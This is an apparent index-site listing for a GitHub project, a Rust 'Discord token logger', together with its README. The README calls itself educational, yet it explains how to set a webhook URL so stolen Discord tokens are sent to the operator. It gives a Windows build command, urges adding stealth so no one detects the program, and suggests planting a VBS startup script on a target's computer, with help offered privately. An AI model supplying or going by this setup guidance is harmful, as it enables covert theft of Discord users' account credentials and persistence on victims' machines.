Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/masterofbrokenlogic/discordtokenlogger

This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.
https://github.com/masterofbrokenlogic/discordtokenlogger

discord logger rust token token-logger

Last synced: 9 days ago
JSON representation

This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.

Awesome Lists containing this project

README

        

# Discord Token Logger

![Rust](https://img.shields.io/badge/Rust-1.54.0-orange?style=for-the-badge)
![Build](https://img.shields.io/badge/Build-Passing-brightgreen?style=for-the-badge)
![Platform](https://img.shields.io/badge/Platform-Windows-blue?style=for-the-badge)

A Discord Token Logger Written in Rust.

### Configuration

On line 11 in [main.rs](https://github.com/MasterOfBrokenLogic/DiscordTokenLogger/blob/main/src/main.rs) , replace the variable with your webhook URL from Discord.
If you're unsure about what a Webhook URL is or how to obtain one, feel free to reach out to me on WhatsApp for assistance. I'm here to help, my friend!

```rust
let url = "Discord Webhook URL";
```

To build this project just run:

```shell
$ cargo build --target x86_64-pc-windows-gnu
```

This is just a simple Token Logger, you can add more features for the stealth of the program, so no one can detect this. Create a vbs program in the Targets computer to run this project in the startup, If you need the vbs code to make this program to run in the startup, message me.
I hate strings :3